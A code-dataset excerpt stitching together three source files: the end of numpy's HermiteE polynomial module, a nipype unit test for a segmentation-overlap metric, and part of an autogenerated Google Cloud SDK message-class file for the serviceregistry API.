c = hermeval(x, c)
c = hermeval(y, c, tensor=False)
c = hermeval(z, c, tensor=False)
return c
def hermegrid3d(x, y, z, c):
"""
Evaluate a 3-D HermiteE series on the Cartesian product of x, y, and z.
This function returns the values:
.. math:: p(a,b,c) = \\sum_{i,j,k} c_{i,j,k} * He_i(a) * He_j(b) * He_k(c)
where the points `(a, b, c)` consist of all triples formed by taking
`a` from `x`, `b` from `y`, and `c` from `z`. The resulting points form
a grid with `x` in the first dimension, `y` in the second, and `z` in
the third.
The parameters `x`, `y`, and `z` are converted to arrays only if they
are tuples or a lists, otherwise they are treated as a scalars. In
either case, either `x`, `y`, and `z` or their elements must support
multiplication and addition both with themselves and with the elements
of `c`.
If `c` has fewer than three dimensions, ones are implicitly appended to
its shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape + y.shape + z.shape.
Parameters
----------
x, y, z : array_like, compatible objects
The three dimensional series is evaluated at the points in the
Cartesian product of `x`, `y`, and `z`. If `x`,`y`, or `z` is a
list or tuple, it is first converted to an ndarray, otherwise it is
left unchanged and, if it isn't an ndarray, it is treated as a
scalar.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree i,j are contained in ``c[i,j]``. If `c` has dimension
greater than two the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points in the Cartesian
product of `x` and `y`.
See Also
--------
hermeval, hermeval2d, hermegrid2d, hermeval3d
Notes
-----
.. versionadded::1.7.0
"""
c = hermeval(x, c)
c = hermeval(y, c)
c = hermeval(z, c)
return c
def hermevander(x, deg):
"""Pseudo-Vandermonde matrix of given degree.
Returns the pseudo-Vandermonde matrix of degree `deg` and sample points
`x`. The pseudo-Vandermonde matrix is defined by
.. math:: V[..., i] = He_i(x),
where `0 <= i <= deg`. The leading indices of `V` index the elements of
`x` and the last index is the degree of the HermiteE polynomial.
If `c` is a 1-D array of coefficients of length `n + 1` and `V` is the
array ``V = hermevander(x, n)``, then ``np.dot(V, c)`` and
``hermeval(x, c)`` are the same up to roundoff. This equivalence is
useful both for least squares fitting and for the evaluation of a large
number of HermiteE series of the same degree and sample points.
Parameters
----------
x : array_like
Array of points. The dtype is converted to float64 or complex128
depending on whether any of the elements are complex. If `x` is
scalar it is converted to a 1-D array.
deg : int
Degree of the resulting matrix.
Returns
-------
vander : ndarray
The pseudo-Vandermonde matrix. The shape of the returned matrix is
``x.shape + (deg + 1,)``, where The last index is the degree of the
corresponding HermiteE polynomial. The dtype will be the same as
the converted `x`.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermevander
>>> x = np.array([-1, 0, 1])
>>> hermevander(x, 3)
array([[ 1., -1., 0., 2.],
[ 1., 0., -1., -0.],
[ 1., 1., 0., -2.]])
"""
ideg = int(deg)
if ideg != deg:
raise ValueError("deg must be integer")
if ideg < 0:
raise ValueError("deg must be non-negative")
x = np.array(x, copy=0, ndmin=1) + 0.0
dims = (ideg + 1,) + x.shape
dtyp = x.dtype
v = np.empty(dims, dtype=dtyp)
v[0] = x*0 + 1
if ideg > 0:
v[1] = x
for i in range(2, ideg + 1):
v[i] = (v[i-1]*x - v[i-2]*(i - 1))
return np.rollaxis(v, 0, v.ndim)
def hermevander2d(x, y, deg):
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y)`. The pseudo-Vandermonde matrix is defined by
.. math:: V[..., deg[1]*i + j] = He_i(x) * He_j(y),
where `0 <= i <= deg[0]` and `0 <= j <= deg[1]`. The leading indices of
`V` index the points `(x, y)` and the last index encodes the degrees of
the HermiteE polynomials.
If ``V = hermevander2d(x, y, [xdeg, ydeg])``, then the columns of `V`
correspond to the elements of a 2-D coefficient array `c` of shape
(xdeg + 1, ydeg + 1) in the order
.. math:: c_{00}, c_{01}, c_{02} ... , c_{10}, c_{11}, c_{12} ...
and ``np.dot(V, c.flat)`` and ``hermeval2d(x, y, c)`` will be the same
up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 2-D HermiteE
series of the same degrees and sample points.
Parameters
----------
x, y : array_like
Arrays of point coordinates, all of the same shape. The dtypes
will be converted to either float64 or complex128 depending on
whether any of the elements are complex. Scalars are converted to
1-D arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg].
Returns
-------
vander2d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
:math:`order = (deg[0]+1)*(deg([1]+1)`. The dtype will be the same
as the converted `x` and `y`.
See Also
--------
hermevander, hermevander3d. hermeval2d, hermeval3d
Notes
-----
.. versionadded::1.7.0
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy = ideg
x, y = np.array((x, y), copy=0) + 0.0
vx = hermevander(x, degx)
vy = hermevander(y, degy)
v = vx[..., None]*vy[..., None,:]
return v.reshape(v.shape[:-2] + (-1,))
def hermevander3d(x, y, z, deg):
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y, z)`. If `l, m, n` are the given degrees in `x, y, z`,
then Hehe pseudo-Vandermonde matrix is defined by
.. math:: V[..., (m+1)(n+1)i + (n+1)j + k] = He_i(x)*He_j(y)*He_k(z),
where `0 <= i <= l`, `0 <= j <= m`, and `0 <= j <= n`. The leading
indices of `V` index the points `(x, y, z)` and the last index encodes
the degrees of the HermiteE polynomials.
If ``V = hermevander3d(x, y, z, [xdeg, ydeg, zdeg])``, then the columns
of `V` correspond to the elements of a 3-D coefficient array `c` of
shape (xdeg + 1, ydeg + 1, zdeg + 1) in the order
.. math:: c_{000}, c_{001}, c_{002},... , c_{010}, c_{011}, c_{012},...
and ``np.dot(V, c.flat)`` and ``hermeval3d(x, y, z, c)`` will be the
same up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 3-D HermiteE
series of the same degrees and sample points.
Parameters
----------
x, y, z : array_like
Arrays of point coordinates, all of the same shape. The dtypes will
be converted to either float64 or complex128 depending on whether
any of the elements are complex. Scalars are converted to 1-D
arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg, z_deg].
Returns
-------
vander3d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
:math:`order = (deg[0]+1)*(deg([1]+1)*(deg[2]+1)`. The dtype will
be the same as the converted `x`, `y`, and `z`.
See Also
--------
hermevander, hermevander3d. hermeval2d, hermeval3d
Notes
-----
.. versionadded::1.7.0
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy, degz = ideg
x, y, z = np.array((x, y, z), copy=0) + 0.0
vx = hermevander(x, degx)
vy = hermevander(y, degy)
vz = hermevander(z, degz)
v = vx[..., None, None]*vy[..., None,:, None]*vz[..., None, None,:]
return v.reshape(v.shape[:-3] + (-1,))
def hermefit(x, y, deg, rcond=None, full=False, w=None):
"""
Least squares fit of Hermite series to data.
Return the coefficients of a HermiteE series of degree `deg` that is
the least squares fit to the data values `y` given at points `x`. If
`y` is 1-D the returned coefficients will also be 1-D. If `y` is 2-D
multiple fits are done, one for each column of `y`, and the resulting
coefficients are stored in the corresponding columns of a 2-D return.
The fitted polynomial(s) are in the form
.. math:: p(x) = c_0 + c_1 * He_1(x) + ... + c_n * He_n(x),
where `n` is `deg`.
Parameters
----------
x : array_like, shape (M,)
x-coordinates of the M sample points ``(x[i], y[i])``.
y : array_like, shape (M,) or (M, K)
y-coordinates of the sample points. Several data sets of sample
points sharing the same x-coordinates can be fitted at once by
passing in a 2D-array that contains one dataset per column.
deg : int
Degree of the fitting polynomial
rcond : float, optional
Relative condition number of the fit. Singular values smaller than
this relative to the largest singular value will be ignored. The
default value is len(x)*eps, where eps is the relative precision of
the float type, about 2e-16 in most cases.
full : bool, optional
Switch determining nature of return value. When it is False (the
default) just the coefficients are returned, when True diagnostic
information from the singular value decomposition is also returned.
w : array_like, shape (`M`,), optional
Weights. If not None, the contribution of each point
``(x[i],y[i])`` to the fit is weighted by `w[i]`. Ideally the
weights are chosen so that the errors of the products ``w[i]*y[i]``
all have the same variance. The default value is None.
Returns
-------
coef : ndarray, shape (M,) or (M, K)
Hermite coefficients ordered from low to high. If `y` was 2-D,
the coefficients for the data in column k of `y` are in column
`k`.
[residuals, rank, singular_values, rcond] : list
These values are only returned if `full` = True
resid -- sum of squared residuals of the least squares fit
rank -- the numerical rank of the scaled Vandermonde matrix
sv -- singular values of the scaled Vandermonde matrix
rcond -- value of `rcond`.
For more details, see `linalg.lstsq`.
Warns
-----
RankWarning
The rank of the coefficient matrix in the least-squares fit is
deficient. The warning is only raised if `full` = False. The
warnings can be turned off by
>>> import warnings
>>> warnings.simplefilter('ignore', RankWarning)
See Also
--------
chebfit, legfit, polyfit, hermfit, polyfit
hermeval : Evaluates a Hermite series.
hermevander : pseudo Vandermonde matrix of Hermite series.
hermeweight : HermiteE weight function.
linalg.lstsq : Computes a least-squares fit from the matrix.
scipy.interpolate.UnivariateSpline : Computes spline fits.
Notes
-----
The solution is the coefficients of the HermiteE series `p` that
minimizes the sum of the weighted squared errors
.. math:: E = \\sum_j w_j^2 * |y_j - p(x_j)|^2,
where the :math:`w_j` are the weights. This problem is solved by
setting up the (typically) overdetermined matrix equation
.. math:: V(x) * c = w * y,
where `V` is the pseudo Vandermonde matrix of `x`, the elements of `c`
are the coefficients to be solved for, and the elements of `y` are the
observed values. This equation is then solved using the singular value
decomposition of `V`.
If some of the singular values of `V` are so small that they are
neglected, then a `RankWarning` will be issued. This means that the
coefficient values may be poorly determined. Using a lower order fit
will usually get rid of the warning. The `rcond` parameter can also be
set to a value smaller than its default, but the resulting fit may be
spurious and have large contributions from roundoff error.
Fits using HermiteE series are probably most useful when the data can
be approximated by ``sqrt(w(x)) * p(x)``, where `w(x)` is the HermiteE
weight. In that case the weight ``sqrt(w(x[i])`` should be used
together with data values ``y[i]/sqrt(w(x[i])``. The weight function is
available as `hermeweight`.
References
----------
.. [1] Wikipedia, "Curve fitting",
http://en.wikipedia.org/wiki/Curve_fitting
Examples
--------
>>> from numpy.polynomial.hermite_e import hermefik, hermeval
>>> x = np.linspace(-10, 10)
>>> err = np.random.randn(len(x))/10
>>> y = hermeval(x, [1, 2, 3]) + err
>>> hermefit(x, y, 2)
array([ 1.01690445, 1.99951418, 2.99948696])
"""
order = int(deg) + 1
x = np.asarray(x) + 0.0
y = np.asarray(y) + 0.0
# check arguments.
if deg < 0:
raise ValueError("expected deg >= 0")
if x.ndim != 1:
raise TypeError("expected 1D vector for x")
if x.size == 0:
raise TypeError("expected non-empty vector for x")
if y.ndim < 1 or y.ndim > 2:
raise TypeError("expected 1D or 2D array for y")
if len(x) != len(y):
raise TypeError("expected x and y to have same length")
# set up the least squares matrices in transposed form
lhs = hermevander(x, deg).T
rhs = y.T
if w is not None:
w = np.asarray(w) + 0.0
if w.ndim != 1:
raise TypeError("expected 1D vector for w")
if len(x) != len(w):
raise TypeError("expected x and w to have same length")
# apply weights. Don't use inplace operations as they
# can cause problems with NA.
lhs = lhs * w
rhs = rhs * w
# set rcond
if rcond is None:
rcond = len(x)*np.finfo(x.dtype).eps
# Determine the norms of the design matrix columns.
if issubclass(lhs.dtype.type, np.complexfloating):
scl = np.sqrt((np.square(lhs.real) + np.square(lhs.imag)).sum(1))
else:
scl = np.sqrt(np.square(lhs).sum(1))
scl[scl == 0] = 1
# Solve the least squares problem.
c, resids, rank, s = la.lstsq(lhs.T/scl, rhs.T, rcond)
c = (c.T/scl).T
# warn on rank reduction
if rank != order and not full:
msg = "The fit may be poorly conditioned"
warnings.warn(msg, pu.RankWarning)
if full:
return c, [resids, rank, s, rcond]
else:
return c
def hermecompanion(c):
"""
Return the scaled companion matrix of c.
The basis polynomials are scaled so that the companion matrix is
symmetric when `c` is an HermiteE basis polynomial. This provides
better eigenvalue estimates than the unscaled case and for basis
polynomials the eigenvalues are guaranteed to be real if
`numpy.linalg.eigvalsh` is used to obtain them.
Parameters
----------
c : array_like
1-D array of HermiteE series coefficients ordered from low to high
degree.
Returns
-------
mat : ndarray
Scaled companion matrix of dimensions (deg, deg).
Notes
-----
.. versionadded::1.7.0
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) < 2:
raise ValueError('Series must have maximum degree of at least 1.')
if len(c) == 2:
return np.array([[-c[0]/c[1]]])
n = len(c) - 1
mat = np.zeros((n, n), dtype=c.dtype)
scl = np.hstack((1., 1./np.sqrt(np.arange(n - 1, 0, -1))))
scl = np.multiply.accumulate(scl)[::-1]
top = mat.reshape(-1)[1::n+1]
bot = mat.reshape(-1)[n::n+1]
top[...] = np.sqrt(np.arange(1, n))
bot[...] = top
mat[:, -1] -= scl*c[:-1]/c[-1]
return mat
def hermeroots(c):
"""
Compute the roots of a HermiteE series.
Return the roots (a.k.a. "zeros") of the polynomial
.. math:: p(x) = \\sum_i c[i] * He_i(x).
Parameters
----------
c : 1-D array_like
1-D array of coefficients.
Returns
-------
out : ndarray
Array of the roots of the series. If all the roots are real,
then `out` is also real, otherwise it is complex.
See Also
--------
polyroots, legroots, lagroots, hermroots, chebroots
Notes
-----
The root estimates are obtained as the eigenvalues of the companion
matrix, Roots far from the origin of the complex plane may have large
errors due to the numerical instability of the series for such
values. Roots with multiplicity greater than 1 will also show larger
errors as the value of the series near such points is relatively
insensitive to errors in the roots. Isolated roots near the origin can
be improved by a few iterations of Newton's method.
The HermiteE series basis polynomials aren't powers of `x` so the
results of this function may seem unintuitive.
Examples
--------
>>> from numpy.polynomial.hermite_e import hermeroots, hermefromroots
>>> coef = hermefromroots([-1, 0, 1])
>>> coef
array([ 0., 2., 0., 1.])
>>> hermeroots(coef)
array([-1., 0., 1.])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) <= 1:
return np.array([], dtype=c.dtype)
if len(c) == 2:
return np.array([-c[0]/c[1]])
m = hermecompanion(c)
r = la.eigvals(m)
r.sort()
return r
def _normed_hermite_e_n(x, n):
"""
Evaluate a normalized HermiteE polynomial.
Compute the value of the normalized HermiteE polynomial of degree ``n``
at the points ``x``.
Parameters
----------
x : ndarray of double.
Points at which to evaluate the function
n : int
Degree of the normalized HermiteE function to be evaluated.
Returns
-------
values : ndarray
The shape of the return value is described above.
Notes
-----
.. versionadded:: 1.10.0
This function is needed for finding the Gauss points and integration
weights for high degrees. The values of the standard HermiteE functions
overflow when n >= 207.
"""
if n == 0:
return np.ones(x.shape)/np.sqrt(np.sqrt(2*np.pi))
c0 = 0.
c1 = 1./np.sqrt(np.sqrt(2*np.pi))
nd = float(n)
for i in range(n - 1):
tmp = c0
c0 = -c1*np.sqrt((nd - 1.)/nd)
c1 = tmp + c1*x*np.sqrt(1./nd)
nd = nd - 1.0
return c0 + c1*x
def hermegauss(deg):
"""
Gauss-HermiteE quadrature.
Computes the sample points and weights for Gauss-HermiteE quadrature.
These sample points and weights will correctly integrate polynomials of
degree :math:`2*deg - 1` or less over the interval :math:`[-\inf, \inf]`
with the weight function :math:`f(x) = \exp(-x^2/2)`.
Parameters
----------
deg : int
Number of sample points and weights. It must be >= 1.
Returns
-------
x : ndarray
1-D ndarray containing the sample points.
y : ndarray
1-D ndarray containing the weights.
Notes
-----
.. versionadded::1.7.0
The results have only been tested up to degree 100, higher degrees may
be problematic. The weights are determined by using the fact that
.. math:: w_k = c / (He'_n(x_k) * He_{n-1}(x_k))
where :math:`c` is a constant independent of :math:`k` and :math:`x_k`
is the k'th root of :math:`He_n`, and then scaling the results to get
the right value when integrating 1.
"""
ideg = int(deg)
if ideg != deg or ideg < 1:
raise ValueError("deg must be a non-negative integer")
# first approximation of roots. We use the fact that the companion
# matrix is symmetric in this case in order to obtain better zeros.
c = np.array([0]*deg + [1])
m = hermecompanion(c)
x = la.eigvalsh(m)
x.sort()
# improve roots by one application of Newton
dy = _normed_hermite_e_n(x, ideg)
df = _normed_hermite_e_n(x, ideg - 1) * np.sqrt(ideg)
x -= dy/df
# compute the weights. We scale the factor to avoid possible numerical
# overflow.
fm = _normed_hermite_e_n(x, ideg - 1)
fm /= np.abs(fm).max()
w = 1/(fm * fm)
# for Hermite_e we can also symmetrize
w = (w + w[::-1])/2
x = (x - x[::-1])/2
# scale w to get the right value
w *= np.sqrt(2*np.pi) / w.sum()
return x, w
def hermeweight(x):
"""Weight function of the Hermite_e polynomials.
The weight function is :math:`\exp(-x^2/2)` and the interval of
integration is :math:`[-\inf, \inf]`. the HermiteE polynomials are
orthogonal, but not normalized, with respect to this weight function.
Parameters
----------
x : array_like
Values at which the weight function will be computed.
Returns
-------
w : ndarray
The weight function at `x`.
Notes
-----
.. versionadded::1.7.0
"""
w = np.exp(-.5*x**2)
return w
#
# HermiteE series class
#
class HermiteE(ABCPolyBase):
"""An HermiteE series class.
The HermiteE class provides the standard Python numerical methods
'+', '-', '*', '//', '%', 'divmod', '**', and '()' as well as the
attributes and methods listed in the `ABCPolyBase` documentation.
Parameters
----------
coef : array_like
HermiteE coefficients in order of increasing degree, i.e,
``(1, 2, 3)`` gives ``1*He_0(x) + 2*He_1(X) + 3*He_2(x)``.
domain : (2,) array_like, optional
Domain to use. The interval ``[domain[0], domain[1]]`` is mapped
to the interval ``[window[0], window[1]]`` by shifting and scaling.
The default value is [-1, 1].
window : (2,) array_like, optional
Window, see `domain` for its use. The default value is [-1, 1].
.. versionadded:: 1.6.0
"""
# Virtual Functions
_add = staticmethod(hermeadd)
_sub = staticmethod(hermesub)
_mul = staticmethod(hermemul)
_div = staticmethod(hermediv)
_pow = staticmethod(hermepow)
_val = staticmethod(hermeval)
_int = staticmethod(hermeint)
_der = staticmethod(hermeder)
_fit = staticmethod(hermefit)
_line = staticmethod(hermeline)
_roots = staticmethod(hermeroots)
_fromroots = staticmethod(hermefromroots)
# Virtual properties
nickname = 'herme'
domain = np.array(hermedomain)
window = np.array(hermedomain)
| bsd-3-clause |
grlee77/nipype | nipype/algorithms/tests/test_overlap.py | 7 | 1388 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
import os
from shutil import rmtree
from tempfile import mkdtemp
from nipype.testing import (assert_equal, assert_raises,
assert_almost_equal, example_data)
import numpy as np
import nibabel as nb
def test_overlap():
from nipype.algorithms.metrics import Overlap
def check_close(val1, val2):
import numpy.testing as npt
return npt.assert_almost_equal(val1, val2, decimal=3)
tempdir = mkdtemp()
in1 = example_data('segmentation0.nii.gz')
in2 = example_data('segmentation1.nii.gz')
os.chdir(tempdir)
overlap = Overlap()
overlap.inputs.volume1 = in1
overlap.inputs.volume2 = in1
res = overlap.run()
yield check_close, res.outputs.jaccard, 1.0
overlap = Overlap()
overlap.inputs.volume1 = in1
overlap.inputs.volume2 = in2
res = overlap.run()
yield check_close, res.outputs.jaccard, 0.99705
overlap = Overlap()
overlap.inputs.volume1 = in1
overlap.inputs.volume2 = in2
overlap.inputs.vol_units = 'mm'
res = overlap.run()
yield check_close, res.outputs.jaccard, 0.99705
yield (check_close, res.outputs.roi_voldiff,
np.array([0.0063086, -0.0025506, 0.0]))
rmtree(tempdir)
| bsd-3-clause |
Sorsly/subtle | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/serviceregistry/v1alpha/serviceregistry_v1alpha_messages.py | 1 | 22119 | """Generated message classes for serviceregistry version v1alpha.
Manages service endpoints in Service Registry and provides integration with
DNS for service discovery and name resolution.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
package = 'serviceregistry'
class Endpoint(_messages.Message):
"""Next available tag: 13
Fields:
addresses: User-provided addresses and ports of the service represented by
an endpoint.
creationTimestamp: [Output Only] Creation timestamp in RFC3339 text
format.
description: An optional user-provided description of the endpoint.
dnsIntegration: The DNS configuration for this endpoint. This must be a
list of fully-qualified URLs to Compute Engine networks.
fingerprint: Supply the fingerprint value for update requests. The
fingerprint value is generated by the server and ensures optimistic
concurrency (so that only one update can be performed at a time). The
fingerprint changes after each update.
id: [Output Only] Unique identifier for the resource; defined by the
server.
name: A user-provided name of the endpoint, which must be unique within
the project. The name must comply with RFC1035. Specifically, the name
must be 1-63 characters long and match the regular expression
[a-z]([-a-z0-9]*[a-z0-9])? which means the first character must be a
lowercase letter, and all following characters must be a dash, lowercase
letter, or digit, except the last character, which cannot be a dash.
selfLink: [Output Only] Self link for the endpoint.
state: [Output Only] The current state of the endpoint, as determined by
the system.
"""
addresses = _messages.MessageField('EndpointAddress', 1, repeated=True)
creationTimestamp = _messages.StringField(2)
description = _messages.StringField(3)
dnsIntegration = _messages.MessageField('EndpointDnsIntegration', 4)
fingerprint = _messages.BytesField(5)
id = _messages.IntegerField(6, variant=_messages.Variant.UINT64)
name = _messages.StringField(7)
selfLink = _messages.StringField(8)
state = _messages.StringField(9)
class EndpointAddress(_messages.Message):
"""Information about a single address and the corresponding ports for an
endpoint.
Fields:
address: A list of addresses of the service represented by an endpoint.
Each address can be an IPv4 or IPv6 address, or a hostname.
ports: A list of ports to be used with this address.
"""
address = _messages.StringField(1)
ports = _messages.MessageField('EndpointPort', 2, repeated=True)
class EndpointDnsIntegration(_messages.Message):
"""A EndpointDnsIntegration object.
Fields:
enableExternal: True if a cloud.goog DNS entry should be created to expose
this endpoint externally. NOTE: This feature will be enabled by August
1.
externalDnsName: [Output Only] Externally visible fully qualified domain
name for the endpoint.
internalDnsName: [Output Only] Fully qualified domain name for the
endpoint; used when addressing the endpoint from within Compute Networks
specified in the networks field.
networks: A list of Google Compute Engine networks for which the name of
this endpoint is resolvable through DNS.
"""
enableExternal = _messages.BooleanField(1)
externalDnsName = _messages.StringField(2)
internalDnsName = _messages.StringField(3)
networks = _messages.StringField(4, repeated=True)
class EndpointPort(_messages.Message):
"""Information about a single port used by an endpoint.
Fields:
name: The name of the port. This is optional if only one port is defined
for the endpoint.
portNumber: The port number of the endpoint.
protocol: An optional user-supplied protocol for this port. Must be one of
the following protocol strings: tcp, udp, icmp, esp, ah, or sctp. The
default is tcp.
"""
name = _messages.StringField(1)
portNumber = _messages.IntegerField(2, variant=_messages.Variant.INT32)
protocol = _messages.StringField(3)
class EndpointsListResponse(_messages.Message):
"""A response containing a partial list of Endpoints and a page token used
to build the next request if the request has been truncated. Next available
tag: 6
Fields:
endpoints: The endpoints contained in this response.
nextPageToken: [Output Only] This token allows you to get the next page of
results for list requests. If the number of results is larger than
maxResults, use the nextPageToken as a value for the query parameter
pageToken in the next list request. Subsequent list requests will have
their own nextPageToken to continue paging through the results.
"""
endpoints = _messages.MessageField('Endpoint', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class Operation(_messages.Message):
"""An Operation resource, used to manage asynchronous API requests.
Messages:
ErrorValue: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
clientOperationId: [Output Only] Reserved for future use.
creationTimestamp: [Deprecated] This field is deprecated.
description: [Output Only] A textual description of the operation, which
is set when the operation is created.
endTime: [Output Only] The time that this operation was completed. This
value is in RFC3339 text format.
error: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
httpErrorMessage: [Output Only] If the operation fails, this field
contains the HTTP error message that was returned, such as NOT FOUND.
httpErrorStatusCode: [Output Only] If the operation fails, this field
contains the HTTP error status code that was returned. For example, a
404 means the resource was not found.
id: [Output Only] The unique identifier for the resource. This identifier
is defined by the server.
insertTime: [Output Only] The time that this operation was requested. This
value is in RFC3339 text format.
kind: [Output Only] Type of the resource. Always compute#operation for
Operation resources.
name: [Output Only] Name of the resource.
operationType: [Output Only] The type of operation, such as insert,
update, or delete, and so on.
progress: [Output Only] An optional progress indicator that ranges from 0
to 100. There is no requirement that this be linear or support any
granularity of operations. This should not be used to guess when the
operation will be complete. This number should monotonically increase as
the operation progresses.
region: [Output Only] The URL of the region where the operation resides.
Only available when performing regional operations.
selfLink: [Output Only] Server-defined URL for the resource.
startTime: [Output Only] The time that this operation was started by the
server. This value is in RFC3339 text format.
status: [Output Only] The status of the operation, which can be one of the
following: PENDING, RUNNING, or DONE.
statusMessage: [Output Only] An optional textual description of the
current status of the operation.
targetId: [Output Only] The unique target ID, which identifies a specific
incarnation of the target resource.
targetLink: [Output Only] The URL of the resource that the operation
modifies. For operations related to creating a snapshot, this points to
the persistent disk that the snapshot was created from.
user: [Output Only] User who requested the operation, for example:
[email protected].
warnings: [Output Only] If warning messages are generated during
processing of the operation, this field will be populated.
zone: [Output Only] The URL of the zone where the operation resides. Only
available when performing per-zone operations.
"""
class ErrorValue(_messages.Message):
"""[Output Only] If errors are generated during processing of the
operation, this field will be populated.
Messages:
ErrorsValueListEntry: A ErrorsValueListEntry object.
Fields:
errors: [Output Only] The array of errors encountered while processing
this operation.
"""
class ErrorsValueListEntry(_messages.Message):
"""A ErrorsValueListEntry object.
Fields:
code: [Output Only] The error type identifier for this error.
location: [Output Only] Indicates the field in the request that caused
the error. This property is optional.
message: [Output Only] An optional, human-readable error message.
"""
code = _messages.StringField(1)
location = _messages.StringField(2)
message = _messages.StringField(3)
errors = _messages.MessageField('ErrorsValueListEntry', 1, repeated=True)
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
clientOperationId = _messages.StringField(1)
creationTimestamp = _messages.StringField(2)
description = _messages.StringField(3)
endTime = _messages.StringField(4)
error = _messages.MessageField('ErrorValue', 5)
httpErrorMessage = _messages.StringField(6)
httpErrorStatusCode = _messages.IntegerField(7, variant=_messages.Variant.INT32)
id = _messages.IntegerField(8, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(9)
kind = _messages.StringField(10, default=u'serviceregistry#operation')
name = _messages.StringField(11)
operationType = _messages.StringField(12)
progress = _messages.IntegerField(13, variant=_messages.Variant.INT32)
region = _messages.StringField(14)
selfLink = _messages.StringField(15)
startTime = _messages.StringField(16)
status = _messages.StringField(17)
statusMessage = _messages.StringField(18)
targetId = _messages.IntegerField(19, variant=_messages.Variant.UINT64)
targetLink = _messages.StringField(20)
user = _messages.StringField(21)
warnings = _messages.MessageField('WarningsValueListEntry', 22, repeated=True)
zone = _messages.StringField(23)
class OperationsListResponse(_messages.Message):
"""A response containing a partial list of operations and a page token used
to build the next request if the request has been truncated.
Fields:
nextPageToken: [Output Only] A token used to continue a truncated list
request.
operations: [Output Only] Operations contained in this list response.
"""
nextPageToken = _messages.StringField(1)
operations = _messages.MessageField('Operation', 2, repeated=True)
class ServiceregistryEndpointsDeleteRequest(_messages.Message):
"""A ServiceregistryEndpointsDeleteRequest object.
Fields:
endpoint: The name of the endpoint for this request.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class ServiceregistryEndpointsGetRequest(_messages.Message):
"""A ServiceregistryEndpointsGetRequest object.
Fields:
endpoint: The name of the endpoint for this request.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class ServiceregistryEndpointsInsertRequest(_messages.Message):
"""A ServiceregistryEndpointsInsertRequest object.
Fields:
endpoint: A Endpoint resource to be passed as the request body.
project: The project ID for this request.
"""
endpoint = _messages.MessageField('Endpoint', 1)
project = _messages.StringField(2, required=True)
class ServiceregistryEndpointsListRequest(_messages.Message):
"""A ServiceregistryEndpointsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
